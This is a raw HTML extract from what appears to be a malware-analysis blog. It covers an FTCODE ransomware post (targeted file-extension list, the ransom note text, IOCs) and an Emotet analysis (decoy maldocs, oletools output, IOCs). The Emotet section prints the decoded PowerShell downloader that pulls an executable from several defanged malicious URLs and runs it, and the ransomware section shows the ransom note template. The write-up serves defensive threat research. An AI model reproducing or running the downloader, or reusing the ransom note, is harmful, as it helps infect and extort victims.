class="ss">"*.forge"</span><span class="p">,</span><span class="ss">"*.ltx"</span><span class="p">,</span><span class="ss">"*.bsa"</span><span class="p">,</span><span class="ss">"*.apk"</span><span class="p">,</span><span class="ss">"*.re4"</span><span class="p">,</span><span class="ss">"*.sav"</span><span class="p">,</span><span class="ss">"*.lbf"</span><span class="p">,</span><span class="ss">"*.slm"</span><span class="p">,</span><span class="ss">"*.bik"</span><span class="p">,</span><span class="ss">"*.epk"</span><span class="p">,</span><span class="ss">"*.rgss3a"</span><span class="p">,</span><span class="ss">"*.pak"</span><span class="p">,</span><span class="ss">"*.big"</span><span class="p">,</span><span class="ss">"*wallet"</span><span class="p">,</span><span class="ss">"*.wotreplay"</span><span class="p">,</span><span class="ss">"*.xxx"</span><span class="p">,</span><span class="ss">"*.desc"</span><span class="p">,</span><span class="ss">"*.py"</span><span class="p">,</span><span class="ss">"*.m3u"</span><span class="p">,</span><span class="ss">"*.flv"</span><span class="p">,</span><span class="ss">"*.js"</span><span class="p">,</span><span class="ss">"*.css"</span><span class="p">,</span><span class="ss">"*.rb"</span><span class="p">,</span><span class="ss">"*.png"</span><span class="p">,</span><span class="ss">"*.jpeg"</span><span class="p">,</span><span class="ss">"*.txt"</span><span class="p">,</span><span class="ss">"*.p7c"</span><span class="p">,</span><span class="ss">"*.p7b"</span><span class="p">,</span><span class="ss">"*.p12"</span><span class="p">,</span><span class="ss">"*.pfx"</span><span class="p">,</span><span class="ss">"*.pem"</span><span class="p">,</span><span class="ss">"*.crt"</span><span class="p">,</span><span class="ss">"*.cer"</span><span class="p">,</span><span class="ss">"*.der"</span><span class="p">,</span><span class="ss">"*.x3f"</span><span class="p">,</span><span class="ss">"*.srw"</span><span class="p">,</span><span class="ss">"*.pef"</span><span class="p">,</span><span class="ss">"*.ptx"</span><span class="p">,</span><span class="ss">"*.r3d"</span><span class="p">,</span><span class="ss">"*.rw2"</span><span class="p">,</span><span class="ss">"*.rwl"</span><span class="p">,</span><span class="ss">"*.raw"</span><span class="p">,</span><span class="ss">"*.raf"</span><span class="p">,</span><span class="ss">"*.orf"</span><span class="p">,</span><span class="ss">"*.nrw"</span><span class="p">,</span><span class="ss">"*.mrwref"</span><span class="p">,</span><span class="ss">"*.mef"</span><span class="p">,</span><span class="ss">"*.erf"</span><span class="p">,</span><span class="ss">"*.kdc"</span><span class="p">,</span><span class="ss">"*.dcr"</span><span class="p">,</span><span class="ss">"*.cr2"</span><span class="p">,</span><span class="ss">"*.crw"</span><span class="p">,</span><span class="ss">"*.bay"</span><span class="p">,</span><span class="ss">"*.sr2"</span><span class="p">,</span><span class="ss">"*.srf"</span><span class="p">,</span><span class="ss">"*.arw"</span><span class="p">,</span><span class="ss">"*.3fr"</span><span class="p">,</span><span class="ss">"*.dng"</span><span class="p">,</span><span class="ss">"*.jpe"</span><span class="p">,</span><span class="ss">"*.jpg"</span><span class="p">,</span><span class="ss">"*.cdr"</span><span class="p">,</span><span class="ss">"*.indd"</span><span class="p">,</span><span class="ss">"*.ai"</span><span class="p">,</span><span class="ss">"*.eps"</span><span class="p">,</span><span class="ss">"*.pdf"</span><span class="p">,</span><span class="ss">"*.pdd"</span><span class="p">,</span><span class="ss">"*.psd"</span><span class="p">,</span><span class="ss">"*.dbf"</span><span class="p">,</span><span class="ss">"*.mdf"</span><span class="p">,</span><span class="ss">"*.wb2"</span><span class="p">,</span><span class="ss">"*.rtf"</span><span class="p">,</span><span class="ss">"*.wpd"</span><span class="p">,</span><span class="ss">"*.dxg"</span><span class="p">,</span><span class="ss">"*.xf"</span><span class="p">,</span><span class="ss">"*.dwg"</span><span class="p">,</span><span class="ss">"*.pst"</span><span class="p">,</span><span class="ss">"*.accdb"</span><span class="p">,</span><span class="ss">"*.mdb"</span><span class="p">,</span><span class="ss">"*.pptm"</span><span class="p">,</span><span class="ss">"*.pptx"</span><span class="p">,</span><span class="ss">"*.ppt"</span><span class="p">,</span><span class="ss">"*.xlk"</span><span class="p">,</span><span class="ss">"*.xlsb"</span><span class="p">,</span><span class="ss">"*.xlsm"</span><span class="p">,</span><span class="ss">"*.xlsx"</span><span class="p">,</span><span class="ss">"*.xls"</span><span class="p">,</span><span class="ss">"*.wps"</span><span class="p">,</span><span class="ss">"*.docm"</span><span class="p">,</span><span class="ss">"*.docx"</span><span class="p">,</span><span class="ss">"*.doc"</span><span class="p">,</span><span class="ss">"*.odb"</span><span class="p">,</span><span class="ss">"*.odc"</span><span class="p">,</span><span class="ss">"*.odm"</span><span class="p">,</span><span class="ss">"*.odp"</span><span class="p">,</span><span class="ss">"*.ods"</span><span class="p">,</span><span class="ss">"*.odt"</span>
</pre></div>
<p></br></p>
<p>The ransomnote, dropped as a HTML file with the filename <em>READ_ME_NOW.htm</em></p>
<div class="highlight"><pre><span></span><span class="o"><</span><span class="nv">h1</span><span class="o">></span><span class="nv">All</span> <span class="nv">your</span> <span class="nv">files</span> <span class="nv">was</span> <span class="nv">encrypted</span><span class="o">!</</span><span class="nv">h1</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="nv">Your</span> <span class="nv">personal</span> <span class="nv">ID</span>: <span class="o"><</span><span class="nv">b</span><span class="o">></span>$<span class="nv">whyjfdxez</span><span class="o"></</span><span class="nv">b</span><span class="o">></</span><span class="nv">p</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="nv">Your</span> <span class="nv">personal</span> <span class="nv">KEY</span>: $<span class="nv">gdejthseee</span><span class="o"></</span><span class="nv">p</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="mi">1</span>. <span class="nv">Download</span> <span class="nv">Tor</span> <span class="nv">browser</span> <span class="o">-</span> <span class="o"><</span><span class="nv">a</span> <span class="nv">href</span><span class="o">=</span><span class="s1">'</span><span class="s">https://www.torproject.org/download/</span><span class="s1">'</span><span class="o">></span><span class="nv">https</span>:<span class="o">//</span><span class="nv">www</span>.<span class="nv">torproject</span>.<span class="nv">org</span><span class="o">/</span><span class="nv">download</span><span class="o">/</</span><span class="nv">a</span><span class="o">></</span><span class="nv">p</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="mi">2</span>. <span class="nv">Install</span> <span class="nv">Tor</span> <span class="nv">browser</span><span class="o"></</span><span class="nv">p</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="mi">3</span>. <span class="nv">Open</span> <span class="nv">Tor</span> <span class="nv">Browser</span><span class="o"></</span><span class="nv">p</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="mi">4</span>. <span class="nv">Open</span> <span class="nv">link</span> <span class="nv">in</span> <span class="nv">TOR</span> <span class="nv">browser</span>: <span class="o"><</span><span class="nv">b</span><span class="o">></span><span class="nv">http</span>:<span class="o">//</span><span class="nv">qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd</span>.<span class="nv">onion</span><span class="o">/</span>?<span class="nv">guid</span><span class="o">=</span>$<span class="nv">whyjfdxez</span><span class="o"></</span><span class="nv">b</span><span class="o">></</span><span class="nv">p</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="mi">5</span>. <span class="nv">Follow</span> <span class="nv">the</span> <span class="nv">instructions</span> <span class="nv">on</span> <span class="nv">this</span> <span class="nv">page</span><span class="o"></</span><span class="nv">p</span><span class="o">></span>
<span class="o"><</span><span class="nv">h2</span><span class="o">>*****</span> <span class="nv">Warning</span><span class="o">*****</</span><span class="nv">h2</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="k">Do</span> <span class="nv">not</span> <span class="nv">rename</span> <span class="nv">files</span><span class="o"></</span><span class="nv">p</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="k">Do</span> <span class="nv">not</span> <span class="nv">try</span> <span class="nv">to</span> <span class="nv">back</span> <span class="nv">your</span> <span class="nv">data</span> <span class="nv">using</span> <span class="nv">third</span><span class="o">-</span><span class="nv">party</span> <span class="nv">software</span>, <span class="nv">it</span> <span class="nv">may</span> <span class="nv">cause</span> <span class="nv">permanent</span> <span class="nv">data</span> <span class="nv">loss</span><span class="ss">(</span><span class="k">If</span> <span class="nv">you</span> <span class="k">do</span> <span class="nv">not</span> <span class="nv">believe</span> <span class="nv">us</span>, <span class="nv">and</span> <span class="nv">still</span> <span class="nv">try</span> <span class="nv">to</span> <span class="o">-</span> <span class="nv">make</span> <span class="nv">copies</span> <span class="nv">of</span> <span class="nv">all</span> <span class="nv">files</span> <span class="nv">so</span> <span class="nv">that</span> <span class="nv">we</span> <span class="nv">can</span> <span class="nv">help</span> <span class="nv">you</span> <span class="k">if</span> <span class="nv">third</span><span class="o">-</span><span class="nv">party</span> <span class="nv">software</span> <span class="nv">harms</span> <span class="nv">them</span><span class="ss">)</span><span class="o"></</span><span class="nv">p</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="nv">As</span> <span class="nv">evidence</span>, <span class="nv">we</span> <span class="nv">can</span> <span class="k">for</span> <span class="nv">free</span> <span class="nv">back</span> <span class="nv">one</span> <span class="nv">file</span><span class="o"></</span><span class="nv">p</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="nv">Decoders</span> <span class="nv">of</span> <span class="nv">other</span> <span class="nv">users</span> <span class="nv">is</span> <span class="nv">not</span> <span class="nv">suitable</span> <span class="nv">to</span> <span class="nv">back</span> <span class="nv">your</span> <span class="nv">files</span> <span class="o">-</span> <span class="nv">encryption</span> <span class="nv">key</span> <span class="nv">is</span> <span class="nv">created</span> <span class="nv">on</span> <span class="nv">your</span> <span class="nv">computer</span> <span class="nv">when</span> <span class="nv">the</span> <span class="nv">program</span> <span class="nv">is</span> <span class="nv">launched</span> <span class="o">-</span> <span class="nv">it</span> <span class="nv">is</span> <span class="nv">unique</span>.<span class="o"></</span><span class="nv">p</span><span class="o">></span>
</pre></div>
<p></br></p>
<p>Twitter user treetone alterted possible victims not to pay the ransom since he did not recieve a decryptor after paying the ransom for a client. Obviously there are different reports about the steps after paying the ransom as shown below.</p>
<p><center><blockquote class="twitter-tweet"><p lang="it" dir="ltr">Non pagate, ripeto NON PAGATE il riscatto del ransomware FTCODE che sta arrivando via PEC alle aziende italiane, non vi verrΓ data nessuna private key e nessun software di decrittazione, ho appena provato per un cliente</p>— treetone (@treetone2) <a href="https://twitter.com/treetone2/status/1179722767782072320?ref_src=twsrc%5Etfw">October 3, 2019</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></center></p>
<p></br></p>
<p>As reported by BleepingComputer Forum User Hidemik paying the Ransom will redirect the victim to a page with the instructions to run the following PowerShell Script (I removed the Base64 encoded RSA Key):</p>
<p><center><img alt="HTML Ransomnote" src="https://dissectingmalwa.re/img/gootkit-decryptor.png"></center></p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>Gootkit (SHA256)</h3>
<div class="highlight"><pre><span></span><span class="mi">3</span><span class="n">e846a7316dbc15a38cfd522b14ad3f1a72d79959cbae9fd14621400d77cbc37</span>
</pre></div>
<h3>Malicious .docm (SHA256)</h3>
<div class="highlight"><pre><span></span><span class="n">bf1fae0bca74eb3e788985734c750e33949e24f44f4c6e76c615aa70a80ea175</span>
</pre></div>
<h3>Related Files (SHA256)</h3>
<div class="highlight"><pre><span></span><span class="mi">93</span><span class="n">aef539b491ecd4f3e3bfad2b226e8026d3335e457f5d8ba903e1d76686633e</span> <span class="c1">--> feat-chewy-shipping-confirmation.jpg</span>
<span class="mi">3721</span><span class="n">af6150db2082e6f8342c450070b835a46311c2fade9e1cd5598727d7db4f</span> <span class="c1">--> index.js</span>
<span class="n">e6c58e32c151f2e9e44cd8bc98cdf12373a7f8fc40262e1c4402f2eb6d191d1e</span> <span class="c1">--> invoice_confirmation_534678238865.vbs</span>
</pre></div>
<h3>URLs</h3>
<div class="highlight"><pre><span></span><span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">getpdfreader</span>.<span class="mi">13</span><span class="nv">stripesbrewery</span>[.]<span class="nv">com</span><span class="o">/</span><span class="nv">pdf</span>.<span class="nv">php</span>?<span class="nv">MTo7Njc2NDk3</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">rejoiner</span>[.]<span class="nv">com</span><span class="o">/</span><span class="nv">resources</span><span class="o">/</span><span class="nv">wp</span><span class="o">-</span><span class="nv">content</span><span class="o">/</span><span class="nv">uploads</span><span class="o">/</span><span class="mi">2017</span><span class="o">/</span><span class="mi">04</span><span class="o">/</span><span class="nv">feat</span><span class="o">-</span><span class="nv">chewy</span><span class="o">-</span><span class="nv">shipping</span><span class="o">-</span><span class="nv">confirmation</span>.<span class="nv">jpg</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">ont</span>.<span class="nv">carolinabeercompany</span>[.]<span class="nv">com</span><span class="o">/</span><span class="nv">bolp</span>.<span class="nv">cab</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">wws</span>.<span class="nv">tkgventures</span>[.]<span class="nv">com</span><span class="o">/</span> <span class="ss">(</span><span class="nv">Source</span> <span class="nv">Port</span>: <span class="mi">49207</span><span class="o">/</span> <span class="mi">50769</span>, <span class="mi">194</span>.<span class="mi">76</span>.<span class="mi">224</span>[.]<span class="mi">108</span>:<span class="mi">80</span><span class="ss">)</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">z2g3mtkwotm4</span>[.]<span class="nv">top</span><span class="o">/</span> <span class="ss">(</span><span class="nv">Source</span> <span class="nv">Port</span>: <span class="mi">52742</span><span class="o">/</span> <span class="mi">52745</span>, <span class="mi">35</span>.<span class="mi">187</span>.<span class="mi">36</span>[.]<span class="mi">248</span>:<span class="mi">80</span><span class="ss">)</span>
<span class="nv">hxxps</span>:<span class="o">//</span><span class="nv">adp</span>.<span class="nv">reevesandcompany</span>[.]<span class="nv">com</span><span class="o">/</span><span class="nv">rbody320</span> <span class="ss">(</span><span class="mi">176</span>.<span class="mi">10</span>.<span class="mi">125</span>[.]<span class="mi">87</span>:<span class="mi">443</span><span class="ss">)</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">picturecrafting</span>[.]<span class="nv">site</span> <span class="ss">(</span><span class="mi">208</span>.<span class="mi">91</span>.<span class="mi">197</span>.<span class="mi">91</span><span class="ss">)</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">ogy5mtkwotm4</span>[.]<span class="nv">top</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">mjvjmtkwotm4</span>[.]<span class="nv">top</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">otnhmtkwotm4</span>[.]<span class="nv">top</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">zgzimtkwotm4</span>[.]<span class="nv">top</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">cofee</span>.<span class="nv">theshotboard</span>[.]<span class="nv">net</span><span class="o">/</span>?<span class="nv">need</span><span class="o">=</span><span class="nv">uuid</span><span class="o">&</span><span class="nv">vid</span><span class="o">=</span><span class="nv">dc1</span>:<span class="nv">loadjs</span><span class="o">&</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">aweb</span>.<span class="nv">theshotboard</span>[.]<span class="nv">info</span><span class="o">/</span>?<span class="nv">page</span><span class="o">=</span><span class="nv">xing</span><span class="o">&</span><span class="nv">vid</span><span class="o">=</span><span class="nv">dc1</span>:<span class="nv">load</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">aweb</span>.<span class="nv">theshotboard</span>[.]<span class="nv">info</span><span class="o">/</span><span class="nv">ver</span><span class="o">=</span><span class="mi">926</span>.<span class="mi">3</span><span class="o">&</span><span class="nv">guid</span><span class="o">=</span><span class="nv">VICTIM</span><span class="o">-</span><span class="nv">ID</span><span class="o">+</span><span class="nv">PASSWD</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd</span>[.]<span class="nv">onion</span><span class="o">/</span>?<span class="nv">guid</span><span class="o">=</span><span class="nv">VICTIM</span><span class="o">-</span><span class="nv">ID</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">home</span>.<span class="nv">tith</span>[.]<span class="nv">in</span><span class="o">/</span><span class="nv">seven</span>.<span class="nv">sat</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="k">connect</span>.<span class="nv">simplebutmatters</span>[.]<span class="nv">com</span> <span class="ss">(</span><span class="mi">185</span>.<span class="mi">158</span>.<span class="mi">248</span>[.]<span class="mi">151</span><span class="ss">)</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">home</span>.<span class="nv">isdes</span>[.]<span class="nv">com</span> <span class="ss">(</span><span class="mi">31</span>.<span class="mi">214</span>.<span class="mi">157</span>[.]<span class="mi">3</span><span class="ss">)</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">home</span>.<span class="nv">southerntransitions</span>[.]<span class="nv">net</span> <span class="ss">(</span><span class="mi">31</span>.<span class="mi">214</span>.<span class="mi">157</span>[.]<span class="mi">3</span><span class="ss">)</span>
</pre></div>
<p></br></p>Return of the Mummy - Welcome back, Emotet2019-09-24T00:00:00+02:002019-09-24T00:00:00+02:00f0wLtag:dissectingmalwa.re,2019-09-24:/return-of-the-mummy-welcome-back-emotet.html<p>Or to be more historically precise: Imhotep was the Egyptian, Emotet is the Malware strain we are going to take a Look at. Last week it returned from its summer vacation with a few new tricks</p><p></br></p>
<h4><em>A short disclaimer: downloading and running the samples linked below will compromise your computer and data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>Emotet Sample #1 @ <a href="https://www.hybrid-analysis.com/sample/6076e26a123aaff20c0529ab13b2c5f11259f481e43d62659b33517060bb63c5">Hybrid Analysis</a>
--> <code>sha256 6076e26a123aaff20c0529ab13b2c5f11259f481e43d62659b33517060bb63c5</code></p>
<p>Emotet Sample #2 @ <a href="https://www.hybrid-analysis.com/sample/757b35d20f05b98f2c51fc7a9b6a57ccbbd428576563d3aff7e0c6b70d544975">Hybrid Analysis</a>
--> <code>sha256 757b35d20f05b98f2c51fc7a9b6a57ccbbd428576563d3aff7e0c6b70d544975</code></p>
<p></br></p>
<p><img alt="Emotet Word Image" src="https://dissectingmalwa.re/img/emotet-word1.png"></p>
<p></br></p>
<p>Emotet brought home a few souveniers from summer trip as well. The image above and below show the two most common decoy header pictures that the distributed Maldocs use. To hide the malicious VBA code that hides under the picture they used small textboxes that contain the embedded macro.</p>
<p></br></p>
<p><a href="https://app.any.run/tasks/4ecd561a-d376-4bf7-bf2c-3e8f4dccb6c2">AnyRun Analysis</a></p>
<p></br></p>
<p><img alt="Emotet Word2 Image" src="https://dissectingmalwa.re/img/emotet-word2.png"></p>
<p></br></p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr"><a href="https://twitter.com/hashtag/Emotet?src=hash&ref_src=twsrc%5Etfw">#Emotet</a> malspam campaign uses Snowdenβs new book as lure<a href="https://t.co/J2W6RvKWxC">https://t.co/J2W6RvKWxC</a> <a href="https://t.co/p9v5yox4sE">pic.twitter.com/p9v5yox4sE</a></p>— MB Threat Intel (@MBThreatIntel) <a href="https://twitter.com/MBThreatIntel/status/1176205270898229248?ref_src=twsrc%5Etfw">September 23, 2019</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></center></p>
<p>As Researchers at MalwareBytes found out the malspammers are even trying to lure people into downloading the infected Word Documents by advertising them as Edward Snowden's new Book "Permanent Record". Seems like the criminals reached a new moralic low point.</p>
<p></br></p>
<p>The following two screenshots are excerpts of the report generated by <a href="https://github.com/decalage2/oletools">OLETools</a> on an Emotet Word Document.</p>
<p><img alt="Emotet VBA Analysis 1" src="https://dissectingmalwa.re/img/emotet-vba2.png"></p>
<p></br></p>
<p><center><img alt="Emotet VBA Analysis 2" src="https://dissectingmalwa.re/img/emotet-vbatable.png"></center></p>
<p></br></p>
<p><img alt="Emotet Powershell Script" src="https://dissectingmalwa.re/img/emotet-powershell.png"></p>
<p></br></p>
<p>After decoding the Base64 String we get this command as a result:</p>
<div class="highlight"><pre><span></span>$<span class="nv">solidstatePPV76</span><span class="o">=</span><span class="s1">'</span><span class="s">RhodeIslandB832</span><span class="s1">'</span><span class="c1">;$turquoiseXDz48 = '844';$compressEq464='monitorcJX36';$PersistentWS41=$env:userprofile+'\'+$turquoiseXDz48+'exe';$SmallzLJ27='synergiesEa36';$TCPK2E89=('new-ob'+'je'+'ct') neTwEBClIenT;$customizediV75='hxxps://gcsucai[.]com/wp-content/h891u8f8/@hxxp://www.offmaxindia[.]com/wp-includes/b161/@hxxp://www.kutrialiogludernegi[.]com/cgi-bin/6j1/@hxxp://poshinternationalmedia[.]com/nqec/zcdvgy178/@hxxp://drfalamaki[.]com/Mqm24/btxz33664/'"S`plIt"('@');$Handmadeam16='depositwo79';foreach($invoicekq959 in $customizediV75){try{$TCPK2E89"dOwn`lO`A`DFilE"($invoicekq959, $PersistentWS41);$transmitaT74='transitioniK793';If ((&('Get-I'+'te'+'m') $PersistentWS41)"lenG`TH" -ge 23645) {[DiagnosticsProcess]::"St`ARt"($PersistentWS41);$BuckinghamshireYwZ18='ResearchPwz41';break;$CzechRepublicSBT52='Netherlands.Antilleslj3'}}catch{}}$AwesomeSteelChairtZ21='granularvi43'</span>
</pre></div>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/emotet-die1.png"></center></p>
<p><center><img alt="ActCtx" src="https://dissectingmalwa.re/img/emotet-actctx.png"></center></p>
<p></br></p>
<p></br></p>
<p>Taking a peek at the Imports we can see that the Malware uses (amongst other functions) <a href="https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-terminateprocess">TerminateProcess</a>, <a href="https://docs.microsoft.com/en-us/windows/win32/api/debugapi/nf-debugapi-isdebuggerpresent">IsDebuggerPresent</a> and <a href="https://docs.microsoft.com/en-us/windows/win32/api/timezoneapi/nf-timezoneapi-gettimezoneinformation">GetTimeZoneInfo</a> imported from <em>Kernel32.dll</em>.</p>
<p><center><img alt="Reading Locale" src="https://dissectingmalwa.re/img/emotet-locale.png"></center></p>
<p></br></p>
<p>Furthermore it also imports various functions like <a href="https://docs.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regdeletevaluew">RegDeleteValueW</a> to modify the registry from <em>Advapi32.dll</em>.</p>
<p><center><img alt="IDA Graph Anti-Debug" src="https://dissectingmalwa.re/img/emotet-import-reg.png"></center></p>
<p></br></p>
<p><center><img alt="IDA Graph Anti-Debug" src="https://dissectingmalwa.re/img/emotet-antidebug.png"></center></p>
<p>It uses the <em>IsDebuggerPresent</em> function out of debugapi.h to check if it is actively being debugged and will exit if it returns true.</p>
<p></br></p>
<p><center><img alt="IDA Graph Anti-Debug" src="https://dissectingmalwa.re/img/emotet-con1.png"></center></p>
<p></br></p>
<p><center><img alt="IDA Graph Anti-Debug" src="https://dissectingmalwa.re/img/emotet-payloads.png"></center></p>
<p><center><img alt="Detect it easy Sample 2" src="https://dissectingmalwa.re/img/emotet-die2.png"></center>
<center>The Any.Run Analysis of the second sample can be found <a href="https://app.any.run/tasks/77d2e95d-8059-4806-b815-b749428d5470/">here</a>.</center></p>
<p></br></p>
<p><center><img alt="Typography Expert" src="https://dissectingmalwa.re/img/emotet-comicsans.png"></center></p>
<p><center>Looks like we stumbled across a real Typography expert as well πΉ</center></p>
<p></br></p>
<p><center><img alt="Squirrel Shootout ?!" src="https://dissectingmalwa.re/img/emotet-squirrel.png"></center></p>
<p><center>Squirrel Shootout ?! Sounds like another attempt to frame / disguise as another executable.</center></p>
<p></br></p>
<p><center><img alt="Decryption Routine" src="https://dissectingmalwa.re/img/emotet-decrypt.png"></center>
<center>Interesting strings all around π€</center></p>
<p>Another quite interesting tool to unpack and analyze Emotet is <a href="https://github.com/seth1002/tracecorn_tina">tracecorn_tina</a>, which is (as the name might already suggest) based on <a href="https://github.com/icchy/tracecorn">tracecorn</a>, a Windows API tracer for malware. </p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>Emotet (SHA256)</h3>
<div class="highlight"><pre><span></span><span class="mi">6076</span><span class="n">e26a123aaff20c0529ab13b2c5f11259f481e43d62659b33517060bb63c5</span> <span class="p">(</span><span class="mi">480</span> <span class="n">KiB</span><span class="p">)</span>
<span class="mi">7080</span><span class="n">e1b236a19ed46ea28754916c43a7e8b68727c33cbf81b96077374f4dc205</span> <span class="p">(</span><span class="mi">484</span> <span class="n">KiB</span><span class="p">)</span>
<span class="mi">757</span><span class="n">b35d20f05b98f2c51fc7a9b6a57ccbbd428576563d3aff7e0c6b70d544975</span> <span class="p">(</span><span class="mi">201</span> <span class="n">KiB</span><span class="p">)</span>
</pre></div>
<h3>.docm Files (SHA256)</h3>
<div class="highlight"><pre><span></span><span class="n">ea7391b5dd01d2c79ebe16e842daacc84a0dc5f0174235bbae86b2204312a6ab</span> <span class="c1">--> 5B99674D2005BB01760A1765E4CB3BD06C6A7970.doc</span>
<span class="n">e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855</span> <span class="c1">--> 8KZLXW0QU5K8_NJC.docm</span>
<span class="n">c13a058b51294284b7383b5d5c78eff83529519c207376cf26e94f4e888c5114</span> <span class="c1">--> 9B797E5A9E5FB0789B8278134AF083AA4116B28E.doc</span>
<span class="n">ae63b306cc2787b2acac3770d706db0648f53e1fade14af0104cfcb07001e22d</span> <span class="c1">--> ANHANG 3311 1519749319.doc</span>
<span class="mi">82</span><span class="n">bb3612b299cba0350e1dc4c299af9d50354cc1448b1dd931017f4381d0606a</span> <span class="c1">--> D468EA5BA7A856C12C3AC887C1A023F6B1182165.doc</span>
<span class="mi">78</span><span class="n">d7b30a7a68c3b1da18bcf2ea84904907ecbd96d460b7d94871ac1a6ff21a35</span> <span class="c1">--> DETAILS_09_17_2019MW-33916.docm</span>
<span class="n">d88175cb5257df99953b2cfb65dff302dce425548c54706bf7d23ba6de5eef19</span> <span class="c1">--> DOC-16092019 6678523.doc</span>
<span class="n">cb4a203b541ec40e06c9d9f030dacf22747d62a771385d49d03801945b8d2e1a</span> <span class="c1">--> FB1ADE20382673E3E1D3351FA3155229880F6ECE.doc</span>
<span class="mi">1</span><span class="n">e1eedfe3066f398cdc0805ec5338e2028c0fd7085255c741d31ec35eb3bdbda</span> <span class="c1">--> 7330786_09_23_2019_UIE76589.doc</span>
</pre></div>
<h3>URLs</h3>
<div class="highlight"><pre><span></span><span class="n">hxxps</span><span class="p">:</span><span class="o">//</span><span class="n">autorepuestosdml</span><span class="p">[.]</span><span class="n">com</span><span class="o">/</span><span class="n">wp</span><span class="o">-</span><span class="n">content</span><span class="o">/</span><span class="n">CiloXIptI</span><span class="o">/</span>
<span class="n">hxxps</span><span class="p">:</span><span class="o">//</span><span class="n">pep</span><span class="o">-</span><span class="n">egypt</span><span class="p">[.]</span><span class="n">com</span><span class="o">/</span><span class="n">eedy</span><span class="o">/</span><span class="n">xx3yspke7_l7jp5</span><span class="o">-</span><span class="mi">430067348</span><span class="o">/</span>
<span class="n">hxxps</span><span class="p">:</span><span class="o">//</span><span class="n">danangluxury</span><span class="p">[.]</span><span class="n">com</span><span class="o">/</span><span class="n">wp</span><span class="o">-</span><span class="n">content</span><span class="o">/</span><span class="n">uploads</span><span class="o">/</span><span class="n">KTgQsblu</span><span class="o">/</span>
<span class="n">hxxps</span><span class="p">:</span><span class="o">//</span><span class="n">www</span><span class="p">.</span><span class="n">gcesb</span><span class="p">[.]</span><span class="n">com</span><span class="o">/</span><span class="n">wp</span><span class="o">-</span><span class="n">includes</span><span class="o">/</span><span class="n">customize</span><span class="o">/</span><span class="n">zUfJervuM</span><span class="o">/</span>
<span class="n">hxxps</span><span class="p">:</span><span class="o">//</span><span class="n">bondagetrip</span><span class="p">[.]</span><span class="n">com</span><span class="o">/</span><span class="n">wp</span><span class="o">-</span><span class="n">content</span><span class="o">/</span><span class="n">y0gm3xxs_hmnw8rq</span><span class="o">-</span><span class="mi">764161699</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">www</span><span class="p">.</span><span class="n">offmaxindia</span><span class="p">[.]</span><span class="n">com</span><span class="o">/</span><span class="n">wp</span><span class="o">-</span><span class="n">includes</span><span class="o">/</span><span class="n">b161</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">www</span><span class="p">.</span><span class="n">kutrialiogludernegi</span><span class="p">[.]</span><span class="n">com</span><span class="o">/</span><span class="n">cgi</span><span class="o">-</span><span class="n">bin</span><span class="o">/</span><span class="mi">6</span><span class="n">j1</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">poshinternationalmedia</span><span class="p">[.]</span><span class="n">com</span><span class="o">/</span><span class="n">nqec</span><span class="o">/</span><span class="n">zcdvgy178</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">drfalamaki</span><span class="p">[.]</span><span class="n">com</span><span class="o">/</span><span class="n">Mqm24</span><span class="o">/</span><span class="n">btxz33664</span><span class="o">/</span>
<span class="n">hxxps</span><span class="p">:</span><span class="o">//</span><span class="n">gcsucai</span><span class="p">[.]</span><span class="n">com</span><span class="o">/</span><span class="n">wp</span><span class="o">-</span><span class="n">content</span><span class="o">/</span><span class="n">h891u8f8</span><span class="o">/</span>
</pre></div>
